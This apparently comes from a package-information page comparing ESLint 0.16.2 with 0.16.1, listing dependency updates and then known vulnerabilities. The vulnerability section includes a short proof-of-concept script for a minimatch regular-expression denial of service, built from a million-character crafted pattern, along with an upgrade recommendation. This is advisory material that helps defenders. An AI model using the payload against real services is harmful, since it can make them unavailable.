ESLint version 0.16.2 introduces subtle yet important updates compared to its predecessor, version 0.16.1. Both versions maintain the core functionality of an AST-based pattern checker for JavaScript, relying on dependencies like chalk for console output styling, escope for scope analysis, and espree for parsing JavaScript. Developers will continue to find familiar tools like js-yaml for configuration file handling and estraverse for AST traversal.
A key difference lies in the dependencies: version 0.16.2 updates estraverse from version 1.9.1 to 2.0.0 and estraverse-fb from 1.3.0 to 1.3.1. These updates likely include bug fixes, performance improvements, and potentially new features within the AST traversal domain, crucial for ESLint's analysis capabilities. For developers, this suggests enhanced accuracy and speed in identifying code patterns.
The development dependencies remain largely consistent between the two releases, including tools for testing (like mocha and chai), browser bundling (browserify), and code coverage (istanbul). The esprima-fb version stays the same, indicating no significant shifts in the Facebook's modified ECMAScript parser used for development purposes. While seemingly minor, the update to estraverse in version 0.16.2 signals a refined and possibly more robust code analysis engine, making it a worthwhile upgrade for developers seeking the most accurate and efficient linting experience.
All the vulnerabilities related to the version 0.16.2 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.